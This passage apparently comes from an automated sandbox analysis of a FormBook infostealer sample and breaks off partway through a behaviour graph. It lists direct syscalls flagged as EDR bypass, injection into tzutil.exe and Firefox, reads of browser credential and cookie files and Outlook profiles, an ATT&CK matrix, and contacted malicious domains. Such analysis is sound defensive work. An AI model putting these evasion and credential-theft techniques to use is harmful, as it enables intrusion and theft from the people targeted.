                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138CA38 mov eax, dword ptr fs:[00000030h]4_2_0138CA38
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]4_2_01374A35
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01374A35 mov eax, dword ptr fs:[00000030h]4_2_01374A35
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137EA2E mov eax, dword ptr fs:[00000030h]4_2_0137EA2E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138CA24 mov eax, dword ptr fs:[00000030h]4_2_0138CA24
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DCA11 mov eax, dword ptr fs:[00000030h]4_2_013DCA11
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]4_2_013CCA72
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]4_2_013CCA72
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]4_2_0138CA6F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]4_2_0138CA6F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]4_2_0138CA6F
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FEA60 mov eax, dword ptr fs:[00000030h]4_2_013FEA60
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]4_2_01356A50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]4_2_01360A5B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]4_2_01360A5B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]4_2_01358AA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]4_2_01358AA0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013A6AA4 mov eax, dword ptr fs:[00000030h]4_2_013A6AA4
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388A90 mov edx, dword ptr fs:[00000030h]4_2_01388A90
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]4_2_0135EA80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01424A80 mov eax, dword ptr fs:[00000030h]4_2_01424A80
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]4_2_0138AAEE
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]4_2_0138AAEE
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350AD0 mov eax, dword ptr fs:[00000030h]4_2_01350AD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]4_2_01384AD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]4_2_01384AD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]4_2_013A6ACC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]4_2_013A6ACC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]4_2_013A6ACC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D8D20 mov eax, dword ptr fs:[00000030h]4_2_013D8D20
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]4_2_01346D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]4_2_01346D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]4_2_01346D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01384D1D mov eax, dword ptr fs:[00000030h]4_2_01384D1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]4_2_0136AD00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]4_2_0136AD00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]4_2_0136AD00
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]4_2_01408D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]4_2_01408D10
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E8D6B mov eax, dword ptr fs:[00000030h]4_2_013E8D6B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]4_2_01358D59
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtClose: Direct from: 0x76F12B6C
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: NULL target: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 6236Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\tzutil.exeThread APC queued: target process: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeProcess created: C:\Users\user\Desktop\0Wu31IhwGO.exe "C:\Users\user\Desktop\0Wu31IhwGO.exe"Jump to behavior
                Source: C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: EPnOHZVVNotZ.exe, 00000007.00000000.2235444186.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283547804.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000000.2395335328.00000000015F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: EPnOHZVVNotZ.exe, 00000007.00000000.2235444186.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283547804.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000000.2395335328.00000000015F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: EPnOHZVVNotZ.exe, 00000007.00000000.2235444186.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283547804.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000000.2395335328.00000000015F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: EPnOHZVVNotZ.exe, 00000007.00000000.2235444186.0000000001AD1000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000007.00000002.3283547804.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000000.2395335328.00000000015F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeQueries volume information: C:\Users\user\Desktop\0Wu31IhwGO.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.0Wu31IhwGO.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3285546671.00000000053C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283866931.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3282472668.0000000002690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2334850257.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3283931333.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3283866116.00000000030E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2326212398.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588148 Sample: 0Wu31IhwGO.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 30 www.070001325.xyz 2->30 32 likesharecomment.net 2->32 34 8 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 4 other signatures 2->52 10 0Wu31IhwGO.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\user\AppData\...\0Wu31IhwGO.exe.log, ASCII 10->28 dropped 13 0Wu31IhwGO.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 EPnOHZVVNotZ.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 tzutil.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 EPnOHZVVNotZ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 likesharecomment.net 3.33.130.190, 49734, 49735, 80 AMAZONEXPANSIONGB United States 22->36 38 www.expancz.top 